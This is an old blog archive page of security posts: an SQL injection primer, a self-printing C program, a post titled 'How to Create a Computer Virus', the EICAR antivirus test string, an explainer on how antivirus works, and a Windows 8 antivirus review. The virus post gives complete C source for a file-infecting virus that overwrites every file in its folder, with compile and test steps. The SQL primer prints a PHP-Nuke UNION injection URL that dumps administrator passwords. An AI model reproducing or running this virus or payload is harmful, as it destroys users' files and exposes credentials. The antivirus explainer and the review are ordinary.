Anti Virus - Guide: November 2014

Sunday, 23 November 2014

Introduction to SQL Injection

This article will cover the basics of what SQL Injection is and how it works under the hood. Most people act as if they know SQL Injection just because they can simply use a vulnerability in PHP-Nuke by pasting it in the Address Bar and bam it’s done. It’s not that easy to discover, once discovered it’s a lot easier to use, which is what people mostly do—use already discovered SQL Injections.
What is SQL?
SQL stands for Structured Query Language. It has been around for ages and is designed to work with all programming languages, if not there will be an optional function to simulate what SQL can do. The basic function of SQL is to give full control over databases. With SQL you can call on what is known as a “statement” which will allow you to execute instructions that would do things ranging from displaying just users from a table, or adding new users / passwords / descriptions into a table or DB in general.
Example Scenario:
Let’s say you have an Access Database that contains a table called TblUsers. Each Column contains information on that user, let’s say, it would contain Username, Password, Hash, Email. You want to be able to just show the username and password from the Access DB using SQL Statements. You would do the following:
SELECT Username,Password FROM TblUsers
This would specifically “select” the Username and Password (always seperated by the delimiter “,”) “from” the table you wish to pull the information from, which was TblUsers. Then, you would simply execute your SQL Statement and have it dump to whatever you are displaying the information in (listview, text file, html file etc.).
So, as you can see, SQL is a very handy. That’s just a simple example of what it’s used for. You can also use basic commands like INSERT which would allow you to INSERT information into Columns. Which is where a lot of the vulnerabilities come into play with SQL Injection.
What is SQL Injection? (Example based off PHP scripts)
SQL Injection is a method of injecting data into a remote Table or other sorts of Databases that are managed by SQL Statements. It is not just limited to injecting information. You can also use it to pull back and display valuable information, even using the common statements above, given the correct scenario. A lot of times, SQL Injection is as simple as re-arranging a PHP scripts post information and adding things like “admin=1” etc. which normally would be a hidden function only used for when creating administrators.
A lot of times web logins that you see, which have a section for entering a Username / Password will be querying an SQL Statement that will be used to verify and validate that you are truly a registered user in the database. You could inject SQL commands into the query, sending your own crafted username and password. The limits are endless to the types of information you could be injecting.Let’s look at some prime examples of vulnerabilities in PHP Nuke (they will be out dated, but you will get the idea).
modules.php?name=Downloads&d_op=viewdownload&cid=2%20UNION%20select%20counter,%20aid,%20pwd%20FROM%20nuke_authors%20—”;
Lets cross examine this old vulnerability. At first you see the basic PHP script which are the prime targets for a lot of attacks. They requested a basic page, but after the &cid=2 they executed an SQL Statement, which if the script is not coded to deny SQL statements you can use almost any query on the vulnerable script.
Now, you see that they ran UNION Select Counter,aid,pwd FROM nuke_authors—
UNION is a common statement that allows you to execute two SQL queries together and dump the information all into the same output. After that they use the basic example that I showed you, but notice the “—”? This is a common method used to bypass login credentials. When you execute “—” it’s going to automatically ignore any errors that would otherwise be displayed.
So, the output would be dumping the information from the colums onto the web site.

Conclusion
If you’re wanting to test your own creations for SQL Injection, I recommend getting an SQL book or file that has all of the possible SQL Statements and attacking your own modules with common statements. If you’re wanting a more in-depth set of examples, which would teach you a lot more then what I did, I just gave you the foundation, now yuou must take it that next step and learn on your own, check out SecurityFocus Article.
This article is not huge, but it should give you a basic understanding of SQL Injection and SQL in general. This way when you hear someone bragging about how they attacked a site with SQL Injection and all they could show you is what they injected, but not how they got that information, you know right away the truth about them

C Program to Print its Own Source Code

Ever wondered how to write a C program to print its own source code? Well, here is the source code of a C program that when executed will print its own source code. In other words, the output of this program is exactly same as its source code.

Here’s the program:

#include<stdio.h>

char *program=”#include<stdio.h>%cchar *program=%c%s%c;%cvoid main()%c{%cprintf(program,10,34,program,34,10, 10,10,10);%c}”;

void main()
{
printf(program,10,34,program,34,10,10,10,10);
}

How to Create a Computer Virus? [ 2 ]

This program is an example of how to create a computer virus in C language. This program demonstrates a simple virus program which when executed creates a copy of itself in all the other files that are present in the same directory.

Thus, it destroys other files by infecting them. The infected file will also become a virus so that when executed, it is capable of spreading the infection to another file and so on.

Here’s the source code of the virus program:
#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0); //Search for a file with any extension (*.*)
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

This virus is designed to infect all types of files with any extension.

You can download the source code from the following link:

Download Source code
How the Virus Program Works?

The algorithm of this virus program is as follows:

Step-1: Search for files in the current directory. If one or more file is present, load the first file (target file).

Step-2: Load the copy of the virus itself onto the memory.

Step-3: Open the target file. Copy the virus code from the memory and place it in the target file. Close the target file when the copying process is completed.

Step-4: Load the next file to infect and move to the step-3. If all the files are infected, close all the open files, unload them from the memory and exit.

As far as the technical terms are concerned, I would not be able to explain the program line by line. Anyone with a working knowledge of C should be easily able to understand the functions and other terms used in the program.
How to Compile the Program:

For a step-by-step guide, you can refer my detailed post on how to compile C programs?
How to Test the Virus After the Compilation:

Create a new empty folder.

Put some executable files (or any other files) in the folder.

Run the PC_Virus.exe file. With in a few seconds all the other files in the folder gets infected.

Now every infected file is a new virus which is ready to re-infect. You can copy any of the infected .exe file to another empty folder and repeat the same procedure to see if the infected file is capable of re-infecting. Delete the folder and all the infected files after the testing process is done.

NOTE: The files infected by this virus are destroyed completely and cannot be recovered. So, always test the virus in a new folder by placing some sample files.

WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE.

How to Create a Computer Virus?

How to Test the Working of Your Antivirus: EICAR Test

Have you ever wondered how to test your antivirus software so as to ensure that it is working properly? Well, here is a quick and easy way to safely test your antivirus without having to deal with the real virus. The process is called EICAR test. This test is designed to work on any antivirus software and was developed by European Institute of Computer Antivirus Research.

This process can be used by people, companies and antivirus programmers to test the proper functioning of the antivirus/antimalware software without having to deal with the real computer virus which can cause damage to the computer.
How to Test Your Antivirus?

Here is a step-by-step procedure to test your antivirus functionality:

Open a notepad (New Text Document.TXT) and copy the following code exactly onto it, and save the notepad.
EICAR Test code
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*

Rename the file from “New Text Document.TXT” to “virus-sample.com”.

Now run the antivirus scan on this “virus-sample.com” file.

If the antivirus is working properly on your computer, then it should generate a warning message and immediately delete the file upon scanning. Otherwise, you may have to re-install your antivirus.
NOTE: Most antivirus (with auto-detect feature) will pop-out a warning message in the Step-1 itself.

You can also place the “virus-sample.com” file in a ZIP or RAR file and run a scan on it so as to ensure that your antivirus can detect the test string even in the compressed archive. Any antivirus while scanning this file should respond exactly as it will do for a genuine virus/malicious code.

This test will cause no damage to your computer even though the antivirus will flag it as a malicious script. Hence, it is the safest method to test the proper functioning of any antivirus software.
How EICAR Antivirus Test Works?

During the development of the antivirus software, the AV programmers flag the EICAR test code/string as a verified virus. This is a standard adopted by every antivirus company so as to make the testing process simple and risk-free. Therefore, every antivirus will respond to EICAR string in the same way it does for a genuine malicious code.

How Antivirus Software Works

Due to ever increasing threat from virus and other malicious programs, almost every computer today comes with a pre-installed antivirus software on it. In fact, an antivirus has become one of the most essential software package for every computer.

Even though every one of us have an antivirus software installed on our computers, only a few really bother to understand how it actually works! Well, if you are one among those few who would really bother to understand how antivirus works, then this article is for you.
How Antivirus Works:

An antivirus software typically uses a variety of strategies in detecting and removing viruses, worms and other malware programs. The following are the two most widely employed identification methods:
1. Signature-based dectection (Dictionary approach)

This is the most commonly employed method which involves searching for known patterns of virus within a given file. Every antivirus software will have a dictionary of sample malware codes called signatures in its database. Whenever a file is examined, the antivirus refers to the dictionary of sample codes present within its database and compares the same with the current file. If the piece of code within the file matches with the one in its dictionary then it is flagged and proper action is taken immediately so as to stop the virus from further replicating. The antivirus may choose to repair the file, quarantine or delete it permanently based on its potential risk.

As new viruses and malwares are created and released every day, this method of detection cannot defend against new malwares unless their samples are collected and signatures are released by the antivirus software company. Some companies may also encourage the users to upload new viruses or variants so that, the virus can be analyzed and the signature can be added to the dictionary.

Signature based detection can be very effective, but requires frequent updates of the virus signature dictionary. Hence, the users must update their antivirus software on a regular basis so as to defend against new threats that are released daily.
2. Heuristic-based detection (Suspicious behaviour approach)

Heuristic-based detection involves identifying suspicious behaviour from any given program which might indicate a potential risk. This approach is used by some of the sophisticated antivirus software to identify new malware and variants of known malware.

Unlike the signature based approach, here the antivirus doesn’t attempt to identify known viruses, but instead monitors the behavior of all programs.

For example, malicious behaviours like a program trying to write data to an executable program is flagged and the user is alerted about this action. This method of detection gives an additional level of security from unidentified threats.

File emulation: This is another type of heuristic-based approach where a given program is executed in a virtual environment and the actions performed by it are logged. Based on the actions logged, the antivirus software can determine if the program is malicious or not and carry out necessary actions in order to clean the infection.

Most commercial antivirus software use a combination of both signature-based and heuristic-based approaches to combat malware.
Issues of Concern:

Zero-day threats: A zero-day (zero-hour ) threat or attack is where a malware tries to exploit computer application vulnerabilities that are yet unidentified by the antivirus software companies. These attacks are used to cause damage to the computer even before they are identified. Since patches are not yet released for these kind of new threats, they can easily manage to bypass the antivirus software and carry out malicious actions. However, most of the threats are identified after a day or two of its release, but damage caused by them before identification is quite inevitable.

Daily Updates: Since new viruses and threats are released every day, it is most essential to update the antivirus software so that the virus definitions are kept up-to-date. Most software will have an auto-update feature so that, the virus definitions are updated whenever the computer is connected to the Internet.

Effectiveness: Even though an antivirus software can catch almost every malware, it is still not 100% foolproof against all kinds of threats. As explained earlier, a zero-day threat can easily bypass the protective shield of the antivirus software. Also virus authors have tried to stay a step ahead by writing “oligomorphic“, “polymorphic” and, more recently, “metamorphic” virus codes, which will encrypt parts of themselves or otherwise modify themselves as a method of disguise, so as to not match virus signatures in the dictionary.

Thus user awareness is as important as antivirus software; users must be trained to practice safe surfing habits such as downloading files only from trusted websites and not blindly executing a program that is unknown or obtained from an untrusted source. I hope this article has helped you understand the working of an antivirus software.

List of Killer Antivirus Software for Windows 8

Windows 8 is considered as one of the special creations of Microsoft, as it carries a number of interesting features in it which the predecessors fail to carry. One of the important features includes the robust security system inbuilt in it in the form of Windows Defender, which gives better security to your computer while using the same. However, if you compare it with some of the modern and killer antivirus programs it seems to be lagging behind in many ways. Hence as per experts, it is always a safer and better option to install one of the effective antivirus software over your Windows 8 based system. Some of the killer antivirus software applications are as under for Windows 8 operating system, let’s check them out:

Bitdefender Antivirus

One of the best and popular antivirus software for the Windows 8 based computer is Bitdefender antivirus. Some of the important features include finding out and deleting the viruses creating spaces. Also, it is smart enough to catch different malware programs, which is also the reason why it is a popular option for the Windows 8 based users. This antivirus program also helps in shielding against identity theft or even financial information theft; thanks to its important feature called the Safepay function. Considering a number of features and important pros in it, Bitdefender antivirus has been awarded as the editor’s choice in 2012 from PC Magazine.
The Pros:

As far as the pros are concerned there are many noticeable sides of Bitdefender antivirus. It has high scores in PC magazine’s antivirus tests along with having a nice score too at several independent lab tests. It is good in phishing protection; it also prevents infection transmission to several private data and keeps a check over ID theft. The feature called New Wallet simply manages passwords and private data. The Safepay function in this software protects all your financial transactions, which means you can enjoy a safe and secured kind of online shopping. In case if you visit any suspicious website, it is the first to warn you. Also, this antivirus has a feature called secure gamer mode, 24×7 support and the free of cost credit monitoring service option which play their part in securing your Windows 8 based machines. Lastly, even your social media profiles are secured as it keeps a check over the different vulnerabilities.
The Cons:

Despite the number of pros, Bitdefender antivirus has few cons as well. At times, you may find some issues while installing the same over the malware infested computers. Also, the Wallet Password Management at times cannot fill the web forms. Lastly, once you install it over the Windows 8 based systems it reduces your PC speed owing to the robust scanning steps carried by it.
Kaspersky Antivirus

Kaspersky antivirus software is considered as the backbone of any computer security system and hence is also counted for the Windows 8 based security system. It works behind the scene to deliver some of the most reliable and quickest virus and spyware protection solutions. It is also known to offer the Windows 8 users better malware protection thus securing all your personal and classified info in various ways. Kaspersky antivirus also scans different sites, files, emails, discs, external drives, the apps and chat content to flush out the malicious stuff from these places. You also come across the cloud based and software based protection element, which allow you to offer a robust kind of security regardless of the fact that your system is hooked to the Internet or not. Another appreciating feature is the smart updates, which does a lot of things by consuming less than 1% of your computer resources. Also, you have the option of customizing the several notifications along with configuring the same.
The Pros:

As far as the pros are concerned, it is tested to achieve some of the best results in security software tests. This product comprises of three different licenses and last it easily helps in creating a bootable recovery disk. If you look at its interface, it is designed in one of the most user friendly way along with being very much simple and hassle free to install over your Window 8 computer. The feature called Kaspersky Security Network simply helps in identifying the new threats you encounter in your Windows 8 based systems. You can find quick scan times along with finding good value in it. Lastly it also helps in getting protection against a number of exploits for several insecure settings.
The Cons:

Apart from the pros, it also has few cons to mention. First of all it happens to be very much costly (40 dollars) and secondly it does not contain any firewall. Also, if you are carrying out some special or multiple kinds of scans, then the entire process becomes slow and time consuming job.
Final Word

In a short span of time, Windows 8 has achieved a good amount of popularity among the users. This is because it has a wide range of features, which the earlier versions failed to have. However, to continue using this OS with ease and comfort you need to secure it with reliable antivirus software. The above are two best and killer kind of antivirus software for Windows 8 based PC users.
About the Author

Brianne Walter is a freelance journalist who has been writing about mobile technology, customer relationship management and women’s health for more than a decade. These days she is busy to contributes on amplify.